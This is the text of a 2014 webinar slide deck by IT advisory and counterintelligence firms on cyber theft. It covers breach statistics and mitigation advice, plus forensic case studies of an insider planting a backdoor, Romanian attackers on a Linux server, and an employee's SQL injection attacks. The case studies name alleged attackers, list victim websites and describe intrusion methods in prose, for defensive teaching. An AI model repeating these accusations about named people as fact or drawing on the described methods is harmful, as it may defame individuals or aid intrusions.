The Great Data Robbery Cyber theft and the risks to your organization February 11, 2014 9:45AM – 11:30AM

The Great Data RobberyCyber theft and the risks to your organization

February 11, 20149:45AM – 11:30AM

2

Contents

1. Presenters

2. Background

3. The threat

4. Risks to your organization

5. What your organization can / should be doing

6. The role of Cyber counterintelligence

3

Presenters

• Brittany Teare, Weaver– Manager, IT Advisory Services

• Brian Thomas, Weaver– Partner, IT Advisory Services

• Doug Helton, SpearTip– Director of Counterintelligence

4

Weaver IT Advisory Services

IT Audit (IT internal audit, external audit support, SOX, SOC reporting)

Information Security- Penetration testing- Vulnerability assessment- ISO 27001- Data privacy

IT Consulting- Independent verification & validation- IT assessments and planning- Project risk management

Analytics- Audit preparation- Audit support- Forensics support- Management analytics- Continuous monitoring

5

“Some organizations will be a target regardless of what they do, but most become a target because of what they do. If your organization is indeed a target of choice, understand as much as you can about what your opponent is likely to do and how far they are willing to go.”

-2013 DBIR, pg. 48

6

Background

• In 2013, there are two kinds of companies – those that have been breached, and those that know they’ve been breached.– Who are the victims of breaches?

• 38% larger organizations+

• 37% financial organizations+

• 24% retail and restaurants• 20% manufacturing, transportation, utilities+

• 20% professional services firms+

7

The Threat

• Who are the bad guys? Depends on what information assets or systems you have. Could be:– Nation states like China, Russia, Iran, North Korea– Hacktivists (Anonymous, Wikileaks)– Terrorist organizations– Organized crime

8

The Threat (cont.)

• What do they want? Depends on what information assets or systems you have. Could be:– Defense secrets– Disruption of critical infrastructure– Trade secrets and intellectual property– Confidential information about your organization,

your business dealings, or your customers– Exploitable consumer financial information

9

The Threat (cont.)– How do breaches occur?

• 52% some form of hacking• 76% exploitation of weak or stolen credentials• 40% malware• 35% physical attacks+

• 29% social tactics+

• 13% privileged misuse or abuse

– What are the commonalities?• Financial motives, targeted user devices, compromised

servers, opportunistic attacks, discovery by external parties, time of discovery is multiple months, low difficulty of initial intrusion

10

Risks to Organizations

• Key risks of cyber theft:– Liability for loss of confidential information, loss of

private consumer information, business interruption, or even loss of human life

– Loss of intellectual property / trade secrets / competitive advantage

– Damage from loss of confidentiality– Reputational damage

11

Risk Impact

• Gone are the days when we could bury our heads in the sand. Liability is increasing:– Target– Yahoo– CF Disclosure Guidance:

Topic No. 2 - Cybersecurity

12

What to Do

“Prevention is ideal, detection is a must!”

13

What to Do• Organizations should:

– Classify data– Implement an ISMS– Implement tools to identify

security events– Perform periodic security

assessments based on the specific threats

– Consider cyber counterintelligence

14

Cyber Counterintelligence – Case Studies

15

Cyber Counterintelligence - Overview

What is cyber counterintelligence (Cyber CI)? - Historical roots - Increased awareness and demand

Who is SpearTip? - Military CI and LE agents - Deep technical expertise

Why is Cyber CI relevant?

16

Cyber Counterespionage – Chinese Scientist

Chinese Scientist• East Coast – NanoTech Research Facility

• Accepted position back in Beijing

• Gaining elevated access to sensitive information

• Copying the hard drive and placing it in new system

• Download and use of hacking software

• Introducing malware into environment

17


• Forensic analysis identified the malicious file “FFE3.CB5” at the following location on the subject system• This file was identified by the malware scanning software Sophos as “Trojan.CycBotCn-A”

• This particular malware creates a “backdoor” which allows unauthorized remote access to the subject system• This file was located on the subject system at the aforementioned location. Below is a screenshot of this file with its

creation date and time

• In addition to the malicious file, SpearTip also discovered the presence of an attribute changer• This type of software has the ability to modify date and time stamps within any active file within the file system• Attribute changers are most often used for nefarious purposes, such as to cover one’s tracks following an exploitation or

security breach

C:\Documents and Settings\<user>\Application Data\2CB5F\FFE3.CB5

18


• The subject was also conducting research on how to image a hard drive and how to connect two systems via a USB cable

• Following this research, subject then searched the Internet in an attempt to locate and purchase a laptop that was identical to his company issued laptop

• It was later discovered that he had, indeed, purchased two laptops of the same make and model as HIS company issued laptop

• During SpearTip’s malware analysis, this application was identified as attempting to access the registry framework of the installed host-based antivirus solution

• The corporation’s IT staff was completely unaware of subject’s malicious activity or the malware threat within their network environment

19


• During malware analysis, this application was identified as attempting to access the registry framework of the installed host-based antivirus solution

• IT staff was completely unaware of the malicious activity of the subject or the malware threat within their network environment

20


• Organization’s R&D server was attempting to communicate within the network environment to an Exchange Server

21


• Some of the most recent discoveries have identified yet another method of infiltrating sensitive data from corporate environments, such as deploying a remotely accessible cellular device

• In order to detect and analyze this new technique specialized hardware and software components are required to process various electronic signals emanating from these devices

• This equipment can provide the Cyber Counterintelligence operator a platform that can detect, identify, assess, counter, exploit and/or neutralize this type of threat

• The following examples are equipment that could be used for this type of cyber espionage activity

NAC/802.1x Bypass. In addition to supporting both 3G and Wireless connectivity, the plug & play devices can bypass virtually all NAC/802.1x/RADIUS implementations, providing a reverse shell backdoor and full connectivity to NAC-restricted networks

22

Cyber Counterespionage – Romanian Hack Team

• SpearTip personnel were contacted to respond to an intrusion involving a RedHat server that hosted a tremendous amount of proprietary data

• It was determined that this information was not compromised, although the point of intrusion still needed to be determined for remediation planning

• It was determined that the compromise included the initial exploit, the addition of the “elvis” user, upload of malicious files, and the Romanian attackers then proceeding to utilize this server to carry out their eBay/PayPal phishing scam

• On November 19, 2007, the server began sustaining brute force ssh login attacks• This appeared to be a scripted attack, but however related it may have been, it is highly unlikely to have led

to the compromise itself, as the attackers had a much easier exploit available

• Logs appear to have been manipulated given inexplicable inconsistencies in syslogd timestamps. Syslogd does not log local events out of sequence; therefore information within the log cannot be entirely trusted. Timestamp anomalies are very often a tell-tale sign of rootkits.

23


• On December 18, 2007 at 1012 hours an account and group were created under the username “elvis”

• This server was accessed via the elvis username throughout the Internet from December 18 through December 21, ending only after Source1 deleted the user account

• Not only does the fact that elvis came from so many IPs stand out, it may be noteworthy to mention that their backdoored sshd server can bind as many ports as are open

• In an effort to determine further activity of the attackers, an exhaustive search for all and any remnants of the “.bash_history” file was undertaken

• As shown below, once the attacker gained ssh access, he downloaded and ran multiple exploits and backdoors

24


• According to the information contained within the attacker’s .bash_history file, it appears that the attack vector that SUBJECTS utilized is a file called windmilk.jpg or windmilk.tgz

• Both files are simple gzipped tar files containing the superwu binary. A screenshot of the attack tool can be seen below

• Further analysis led not only to the determination of the attacker’s tools, but references to some of their friends as well

• These friends steered the investigation to look into other members of the hacker group• The “brains” of the operation seemed to be Claudiu Catalin, seen below with another member of the team, Iordache:

25

Cyber Counterespionage – AnonymouSTL

• SpearTip personnel were contacted to respond to an incident involving an employee utilizing corporate assets to conduct numerous high-profiled intrusions to US government and international websites in the name of AnonymouSTL

• A forensic analysis of email activity on SUBJECT’s system was conducted that identified several emails that demonstrate that HE specifically sought and requested Structured Query Language (SQL) training, paid for by the corporation

• While this type of training is not out of the ordinary for someone with subject’s professional responsibilities, training and knowledge of this programming language could be useful for an individual who intentions are to launch website and network-based attacks using SQL Injections

• A SQL Injection is an attack using SQL statements on a poorly designed website, with the intention of compromising a database of information on the website, often exposing that information to the attacker

• During the forensic analysis, several “session” folders were located for the application “W3AF”. This software is used for penetrating and finding weaknesses in web applications

• These session folders were found in the “C:\Users\Administrator\.w3af\sessions\” directory on the subject system• Below is a screenshot of the folder structure from the aforementioned “sessions” directory

26


• An analysis of these session folders was conducted• It was determined from this analysis that scanning, using this application was conducted on the following dates:

• An analysis of the history of websites visited was conducted on subject’s system, focusing on the timeframe following the LogMeIn logon activity at 10:56PM CST

• Below is a listing of this Internet activity• The dates associated with this listing represent the last time the respective URL was visited

• The listing below shows subject accessing several websites with the domain “.ir”• The domain “.ir” is a Top Level Domain Country Code for the country of Iran• The text “func=download” in the Uniform Resource Locators (URLs) for “http://tehran.mim.gov.ir” indicates there were

download attempts made from this website

www.bankofamerica.com December 8, 2011www.winningtech.com December 8, 2011www.mayorslay.com December 13, 2011

27


• The aforementioned download files contain sensitive information such as usernames, credit card numbers and the senders, recipients, and body of various emails

• Below is a screenshot of a single instance of the contents of these .html files, with sensitive information removed

•SpearTip’s analysis found that these attacks occurred on the following websites on the following dates:

http://albayan.co.il 1/9/2012www.avicom.co.il 1/9/2012home.geoenv.biu.ac.il 1/9/2012www.salt.co.il 1/9/2012www.IAPE.org.il 1/10/2012www.IAPP.org.il 1/10/2012www.tamar.co.il 1/10/2012www.isratim.co.il 1/11/2012

CREDICCARDS.html

28


• This forensic analysis included the correlation of data on the subject system with suspected Twitter postings by subject using the screen name “AnonymouSTL”

• The subject system was analyzed to determine if a Twitter account using this username was accessed from this system

• The following twitter posting was located on www.twitter.com for the user “AnonymouSTL”• This posting further corroborates the SUBJECTS involvement in the compromising of websites with “.il” domains

data-screen-name="_AnonymouSTL_"data-user-id="424567950“You can take my life, you can take my freedom, but youwill NEVER TAKE MY PASTEBIN! THIS IS ACCOUNT #6... BETTER LUCK THIS TIME?!?!? #freespeech=shit

29


These postings are also just prior to the SQL Injection attacks launched by subject on the websites within the “.il” domain, on January 9, 10 and 11

30

Cyber CI – Key Focus Areas

Intelligence - driven risk management

Evaluate program effectiveness

Validate internal threat and risk assessment

31

Cyber CI – Application

Recent examples from SpearTip clients

Assess info sec and data classification policies effectiveness

Develop and refine fraud controls

Assess access management program

32

Conclusion

Questions/Discussion

33

Contacts

g

Douglas G. HeltonDirector of Counterintelligence

Tel: 469.601.7564Email: [email protected]

Brian J. Thomas, CISA, CISSPPartner, Advisory ServicesTel: 713.800.1050Email: [email protected] : @IT_Risk

Brittany George Teare, CISAManager, Advisory ServicesTel: 972.448.9299Email: [email protected]